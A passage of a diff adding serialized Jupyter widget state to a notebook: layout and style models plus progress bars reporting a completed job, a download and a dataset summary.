"@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + 
"grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "74a8b740324c4efead37803b886a7921": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "56fcef4dc65e40e087bbb2821874af17": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "8673a30c6d5a4f419020438fd49b2859": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "346c028bf83344f6b6b4ac47d243a3f0": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, 
+ "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "574170a8682d444abdb3a4762b7fc0e5": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "58b355bd18364678a41ca309605018a5": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "8f02fdb7148e4970b349c624f4bdf198": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "bf52704eb9744bc996a1f98bb2b1698d": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + 
"max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "a2855718cc134441a42da59e40da45b7": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "b49ac81502e049ff8c2306bb2b649c9b": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_46c4c21d611e4fd591fa5f7c35854240", + "IPY_MODEL_c7f6a1a793f540f7b455e6e5c333e784", + "IPY_MODEL_dc26ec5c563e4d8894d2e8597326a451" + ], + "layout": "IPY_MODEL_bfb1e9039ae14006b3ce1f52e37361c0" + } + }, + "46c4c21d611e4fd591fa5f7c35854240": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_ee5daed831c846579888db7cdb41f7e3", + "placeholder": "​", + "style": "IPY_MODEL_d0c43db386bb4448a24806a0714ccb17", + "value": "Job ID dcbd65ab-0a25-49b6-992c-8d5bcf2d7ee1 successfully executed: 100%" + } + }, + "c7f6a1a793f540f7b455e6e5c333e784": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_928ef0f255144240a1b45fd3a194679b", + "max": 1, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_f74ea56fe0d54fe796367e996d53dc07", + "value": 1 + } + }, + "dc26ec5c563e4d8894d2e8597326a451": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_31921cdef333470eb225aea88a7394dc", + "placeholder": "​", + "style": "IPY_MODEL_d8f2e9832b6e45baa7b93905f717b586", + "value": "" + } + }, + 
"bfb1e9039ae14006b3ce1f52e37361c0": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ee5daed831c846579888db7cdb41f7e3": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "d0c43db386bb4448a24806a0714ccb17": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "928ef0f255144240a1b45fd3a194679b": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + 
"grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f74ea56fe0d54fe796367e996d53dc07": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "31921cdef333470eb225aea88a7394dc": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "d8f2e9832b6e45baa7b93905f717b586": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "eb2bf24f7c0e40bda34c4ad6ae7f4846": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_5fb2b8eb975e4bcaa4b006ab4d2666ad", + "IPY_MODEL_0d045ce66ac748f39b128dbb07d244ac", + "IPY_MODEL_8c61a995c73042869b1c8ce078243b1f" + ], + "layout": "IPY_MODEL_f74ee834aea648e88643a05dd42f0335" + } + }, + 
"5fb2b8eb975e4bcaa4b006ab4d2666ad": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_6fe1fe4e25ad43f1bc8835e98cca60d2", + "placeholder": "​", + "style": "IPY_MODEL_542b7e2ead0f43019751a18d171b1da3", + "value": "Downloading: 100%" + } + }, + "0d045ce66ac748f39b128dbb07d244ac": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_832c5afe0b1642dbae94c245f46d7616", + "max": 43671, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_5105210c3e6b4bda8c1c09a25036dc13", + "value": 43671 + } + }, + "8c61a995c73042869b1c8ce078243b1f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_0f551e74aa334c1ebde5254c5041ed68", + "placeholder": "​", + "style": "IPY_MODEL_0fc48fa623064b1cbc1f929d3e2dab5e", + "value": "" + } + }, + "f74ee834aea648e88643a05dd42f0335": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "6fe1fe4e25ad43f1bc8835e98cca60d2": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": 
"LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "542b7e2ead0f43019751a18d171b1da3": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "832c5afe0b1642dbae94c245f46d7616": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5105210c3e6b4bda8c1c09a25036dc13": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + "0f551e74aa334c1ebde5254c5041ed68": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + 
"_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "0fc48fa623064b1cbc1f929d3e2dab5e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e87812f5a898469bb2bad220a6e91566": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_5340a286a5c64ae18446fa1c7510715e", + "IPY_MODEL_683df473a75d436e82b07a3169bfd64c", + "IPY_MODEL_05d27b17d2c245ca832a0e9fb175c62b" + ], + "layout": "IPY_MODEL_3cd8c61bb49a43f3b0978837ef9a61bd" + } + }, + "5340a286a5c64ae18446fa1c7510715e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_e617ffc8fe64453794e00ff383adfd49", + "placeholder": "​", + "style": "IPY_MODEL_58117e02cbbe4013899717d9149cadbc", + "value": "Summarize dataset: 100%" + } + }, + "683df473a75d436e82b07a3169bfd64c": { + "model_module": "@jupyter-widgets/controls", + "model_name": "FloatProgressModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "FloatProgressModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "ProgressView", + "bar_style": "success", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_ca7d018d03b349109625155ce8565556", + "max": 5, + "min": 0, + "orientation": "horizontal", + "style": "IPY_MODEL_997d2eb93bc947eb915dfc965c27387e", + "value": 5 + } + }, + "05d27b17d2c245ca832a0e9fb175c62b": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": 
"1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HTMLView", + "description": "", + "description_tooltip": null, + "layout": "IPY_MODEL_f151ebf67d20449a953acbde1cf6459f", + "placeholder": "​", + "style": "IPY_MODEL_5e667a61dcae4b8db4d9f1aeb3903161", + "value": " 82/82 [00:14<00:00,  4.32it/s, Completed]" + } + }, + "3cd8c61bb49a43f3b0978837ef9a61bd": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "e617ffc8fe64453794e00ff383adfd49": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "58117e02cbbe4013899717d9149cadbc": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "ca7d018d03b349109625155ce8565556": { + 
"model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "997d2eb93bc947eb915dfc965c27387e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "ProgressStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "ProgressStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "bar_color": null, + "description_width": "" + } + }, + 